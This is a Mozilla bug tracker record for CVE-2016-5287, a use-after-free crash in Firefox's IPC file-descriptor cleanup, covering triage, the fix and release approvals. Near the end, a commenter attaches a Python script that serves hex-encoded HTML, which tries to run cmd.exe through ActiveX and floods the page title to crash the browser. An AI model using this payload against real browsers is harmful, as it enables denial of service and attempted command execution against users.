Closed Bug 1309823 (CVE-2016-5287) Opened 8 years ago Closed 8 years ago

Crash in nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors

Categories

(Core :: DOM: Service Workers, defect)

49 Branch
x86
Windows
defect
Not set
critical

Tracking

()

RESOLVED FIXED
mozilla52
Tracking Status
firefox49 + fixed
firefox-esr45 --- unaffected
firefox50 + fixed
firefox51 --- fixed
firefox52 + fixed

People

(Reporter: philipp, Assigned: bkelly)

References

Details

(4 keywords)

Crash Data

Attachments

(2 files)

This bug was filed from the Socorro interface and is 
report bp-6e8fc599-f021-4b0c-b5a3-cda7d2161013.
=============================================================
Crashing Thread (27)
Frame 	Module 	Signature 	Source
0 	xul.dll 	nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::SwapArrayElements<nsTArrayInfallibleAllocator, nsTArrayInfallibleAllocator>(nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>&, unsigned int, unsigned int) 	obj-firefox/dist/include/nsTArray-inl.h:346
1 	xul.dll 	nsTArray_Impl<nsCOMPtr<nsIRunnable>, nsTArrayInfallibleAllocator>::SwapElements<nsTArrayInfallibleAllocator>(nsTArray_Impl<nsCOMPtr<nsIRunnable>, nsTArrayInfallibleAllocator>&) 	obj-firefox/dist/include/nsTArray.h:1661
2 	xul.dll 	mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors(nsTArray<mozilla::ipc::FileDescriptor>&) 	ipc/glue/FileDescriptorSetChild.cpp:28
3 	xul.dll 	mozilla::ipc::`anonymous namespace'::CleanupIPCStream 	ipc/glue/IPCStreamUtils.cpp:183
4 	xul.dll 	mozilla::ipc::AutoIPCStream::~AutoIPCStream() 	ipc/glue/IPCStreamUtils.cpp:343
5 	xul.dll 	mozilla::UniquePtr<mozilla::ipc::AutoIPCStream, mozilla::DefaultDelete<mozilla::ipc::AutoIPCStream> >::reset(mozilla::ipc::AutoIPCStream*) 	obj-firefox/dist/include/mozilla/UniquePtr.h:342
6 	xul.dll 	mozilla::dom::cache::AutoChildOpArgs::~AutoChildOpArgs() 	dom/cache/AutoUtils.cpp:141
7 	xul.dll 	mozilla::dom::cache::Cache::Put(mozilla::dom::RequestOrUSVString const&, mozilla::dom::Response&, mozilla::ErrorResult&) 	dom/cache/Cache.cpp:421
8 	xul.dll 	mozilla::dom::CacheBinding::put 	obj-firefox/dom/bindings/CacheBinding.cpp:873
9 	xul.dll 	mozilla::dom::CacheBinding::put_promiseWrapper 	obj-firefox/dom/bindings/CacheBinding.cpp:893

this signature is regressing in 50.0b builds and is mainly happening in the content process. in 50.0b6 they are currently accounting for 3% of all content crashes.

some correlations for the signature on 50.0b:
(100.0% in signature vs 00.23% overall) address = 0xffffffffe5e5e5e9
(81.98% in signature vs 21.36% overall) "EGL?" in app_notes = true
(81.98% in signature vs 21.96% overall) "WebGL?" in app_notes = true
(100.0% in signature vs 40.37% overall) reason = EXCEPTION_ACCESS_VIOLATION_READ
(72.97% in signature vs 20.35% overall) "EGL+" in app_notes = true
(80.18% in signature vs 27.71% overall) dom_ipc_enabled = 1
(72.97% in signature vs 20.83% overall) "WebGL+" in app_notes = true
(72.97% in signature vs 21.48% overall) "GL Context+" in app_notes = true
(72.97% in signature vs 21.48% overall) "GL Context?" in app_notes = true
the crash first started to appear on 2016-10-10 with various different beta versions though, so some external factor may play into this as well.
based on https://bugzilla.mozilla.org/show_bug.cgi?id=1283823#c26 it may be that the e5e5e5e part of the address is indicative of a security issue, so i'm flagging this as a precaution.
Group: core-security
Flags: needinfo?(dveditz)
Not very useful (very generic) stack, but looks like UAF and something to do with workers and maybe the SW cache.
Group: core-security → dom-core-security
Component: General → DOM: Workers
Flags: needinfo?(dveditz) → needinfo?(bkelly)
Maybe the URLs in the crashes will be useful if this hit different build IDs around the same time.

Lots of zalora.co.id
Component: DOM: Workers → DOM: Service Workers
I would have guessed this was introduced in bug 1093357, but that landed in FF49.

I think I see the problem, though:

      if (!aConsumedByIPC) {
        Unused << fdSetActor->Send__delete__(fdSetActor);
      }

      // FileDescriptorSet doesn't clear its fds in its ActorDestroy, so we
      // unconditionally forget them here.  The fds themselves are auto-closed in
      // ~FileDescriptor since they originated in this process.
      fdSetActor->ForgetFileDescriptors(fds);

We should delete the actor after telling it to forget its file descriptors.
Assignee: nobody → bkelly
Status: NEW → ASSIGNED
Flags: needinfo?(bkelly)
Sylvestre, if we do a point release for FF49, I'd like to have this ride-along.  I will have patches up shortly.
Flags: needinfo?(sledru)
I think this is a pretty clear ordering violation.  We must call the method on the actor before starting its deletion.
Attachment #8800794 - Flags: review?(wmccloskey)
Attachment #8800794 - Flags: review?(wmccloskey) → review+
ok, we are discussing about a dot release for a js issue, redirecting to liz
Flags: needinfo?(sledru) → needinfo?(lhenry)
This bug has 49 as unaffected. So it doesn't sound like a candidate for a dot release. 

Also, this should have sec approval though before it lands if you think 51/52 are also affected.
Flags: needinfo?(lhenry)
Comment on attachment 8800794 [details] [diff] [review]
Forget file descriptors before starting actor destruction. r=billm

[Security approval request comment]
How easily could an exploit be constructed based on the patch?

Moderately difficult.  They would have to understand the implication that Send__delete__() can immediately delete an actor and how this ipc/glue code is called.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

I don't think the commit message includes any more information then the patch.  It references "destruction", but I am moving a method that includes "delete" in its name.

Which older supported branches are affected by this flaw?

FF49+

If not all supported branches, which bug introduced the flaw?

Bug 1093357

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

This should apply cleanly.

How likely is this patch to cause regressions; how much testing does it need?

Minimal risk.  Its reordering two calls.  We've fixed similar bugs in the past with changes almost identical to this.

I've also done a try build with an obscured patch name/message:

https://treeherder.mozilla.org/#/jobs?repo=try&revision=e9f99b26d967bfbbd91485cf503dbb78d9aaa429
Attachment #8800794 - Flags: sec-approval?
Attachment #8800794 - Flags: approval-mozilla-release?
Attachment #8800794 - Flags: approval-mozilla-beta?
Attachment #8800794 - Flags: approval-mozilla-aurora?
Liz, it was marked 49 unaffected because the crashes are not showing there.  The bug that introduced the flaw did land in FF49, though.  If no other point release was happening I probably would not push for one.  But I think it would be prudent to do this as a ride-along.
Flags: needinfo?(lhenry)
Based on bug 1093357 I'm going to mark FF49 affected.
sec-approval+ for trunk. We'll need release management approval for Aurora and Beta patches. I'd like to take it there though.
Attachment #8800794 - Flags: sec-approval? → sec-approval+
Comment on attachment 8800794 [details] [diff] [review]
Forget file descriptors before starting actor destruction. r=billm

Sec-high, let's take this on release as well as other branches. I am now aiming a dot release for mid-next week.
Flags: needinfo?(lhenry)
Attachment #8800794 - Flags: approval-mozilla-release?
Attachment #8800794 - Flags: approval-mozilla-release+
Attachment #8800794 - Flags: approval-mozilla-beta?
Attachment #8800794 - Flags: approval-mozilla-beta+
Attachment #8800794 - Flags: approval-mozilla-aurora?
Attachment #8800794 - Flags: approval-mozilla-aurora+
went ahead and landed this on inbound to be able to uplift to release branches hopefully before the weekend in https://hg.mozilla.org/integration/mozilla-inbound/rev/e62579becf83fb7b8524bba995af9c94b20c4ec9
Per comment 15.

Carsten, thanks for landing!
https://hg.mozilla.org/mozilla-central/rev/e62579becf83
Status: ASSIGNED → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla52
Un-track for 51 as it's fixed.
(In reply to Ritu Kothari (:ritu) from comment #22)
> Hi Ben, this is another crash signature that is trending up in Beta50.
> https://crash-stats.mozilla.org/signature/?date=%3C2016-10-
> 17T17%3A10%3A00%2B00%3A00&date=%3E%3D2016-10-
> 10T17%3A10%3A00%2B00%3A00&product=Firefox&version=50.
> 0b&signature=nsTArray_base%3CT%3E%3A%3ASwapArrayElements%3CT%3E%20%7C%20nsTAr
> ray_Impl%3CT%3E%3A%3ASwapElements%3CT%3E%20%7C%20mozilla%3A%3Aipc%3A%3AFileDe
> scriptorSetParent%3A%3AForgetFileDescriptors
> 
> Do you think this is a different problem or it should also be fixed with
> this one?

It should be fixed with the patches landed here.  What beta do we expect this fix to be included in?  I thought it would be in 50b7, but maybe I was confused.
Flags: needinfo?(bkelly)
Ah, I see FF50b7 was built from this push:

https://hg.mozilla.org/releases/mozilla-beta/rev/6efc0964ec62bc4abfdc4cb1dc7cc461c3238634

Which does not seem to include this bug's patch yet.  So I am hopeful both these crashes will be fixed by this patch.
A number of service worker related intermittents seem to have dropped off to zero over the weekend as well.  Hoping that those are all fixed by this.
Alias: CVE-2016-5287
FWIW there have been no reports of either crash signature since this was released.
I'm adding the second signature here then. It's strange because it stopped abruptly on 2016-10-17.
Crash Signature: [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors] → [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors] [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetPa…
Group: dom-core-security
Attached file firefox.txt
#Exploit Title: Mozilla Firefox 49.0.2 Crash
#2-11-2016
#Author: sultan albalawi
#video :https://www.facebook.com/pentest3/videos/vb.100012552940568/204971129931317/?type=2&theater
#it's working  with tor browser you can try
#Tested on:win7
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
host='192.168.88.254'
port=8080
i=0
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
ban+='\n'
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65'
ban+='\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
print ban
print "please wait ...."
htmlcrach=('''\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x65\x78\x28\x29\x0d\x0a\x7b\x0d\x0a\x76\x61\x72\x20\x6f\x62\x6a\x53\x68\x65\x6c\x6c\x20\x3d\x20\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x73\x68\x65\x6c\x6c\x2e\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22\x29\x3b\x0d\x0a\x6f\x62\x6a\x53\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x22\x63\x6d\x64\x2e\x65\x78\x65\x22\x2c\x20\x22\x63\x64\x20\x43\x3a\x20\x43\x3a\x5c\x5c\x63\x64\x20\x63\x3a\x5c\x5c\x65\x78\x74\x5f\x66\x69\x6c\x65\x20\x6d\x61\x69\x6e\x2e\x65\x78\x65\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x22\x2c\x20\x22\x43\x3a\x5c\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x22\x2c\x20\x22\x6f\x70\x65\x6e\x22\x2c\x20\x31\x29\x3b\x0d\x0a\x7d\x0d\x0a\x7b\x0d\x0a\x76\x61\x72\x20\x62\x75\x66\x20\x3d\x20\x22\x22\x3b\x0d\x0a\x66\x6f\x72\x20\x28\x76\x61\x72\x20\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x35\x30\x30\x30\x30\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0d\x0a\x62\x75\x66\x20\x2b\x3d\x20\x22\x41\x22\x3b\x0d\x0a\x7d\x0d\x0a\x76\x61\x72\x20\x62\x75\x66\x66\x20\x3d\x20\x62\x75\x66\x3b\x0d\x0a\x66\x6f\x72\x20\x28\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x35\x30\x30\x30\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0d\x0a\x62\x75\x66\x66\x20\x2b\x3d\x20\x62\x75\x66\x3b\x0d\x0a\x7d\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x74\x69\x74\x6c\x65\x20\x3d\x20\x62\x75\x66\x66\x3b\x0d\x0a\x7d\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d\x0a\x3c\x2f\x61\x3e\x3c\x2f\x62\x6f\x64\x79\x3e\x3c\x2f\x68\x74\x6d\x6c\x3e''')
while i <= 5000:
    i+=1
    ban+=htmlcrach
class Req(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type','text/html')
        self.end_headers()
        self.wfile.write(htmlcrach)
class runHTTP(HTTPServer):
    def __init__(self,host,port):
        ipadd=(host,port)
        HTTPServer.__init__(self,ipadd,Req)
def createfile():
    global filecreate
    filecreate = "test.html"
    open(filecreate, "wb").write(htmlcrach)
    print ('file done: {}').format(filecreate)
def start():
    global filecreate
    ser=runHTTP(host,port)
    print "http://{}:{}/{}".format(host,port,filecreate)
    ser.serve_forever()
createfile()
start()
Flags: needinfo?(madperson)
Mozilla Firefox 49.0.1 - Denial of Service
#Date: 15 Oct 2016
https://www.exploit-db.com/exploits/40536/
Flags: needinfo?(madperson)
Please file a new bug if you think you've found something new.
Flags: needinfo?(sultanalbalawi00)
(In reply to Marco Castelluccio [:marco] from comment #30)
> Please file a new bug if you think you've found something new.

I did
https://bugzilla.mozilla.org/show_bug.cgi?id=1314862

thanks
Flags: needinfo?(sultanalbalawi00)
You need to log in before you can comment on or make changes to this bug.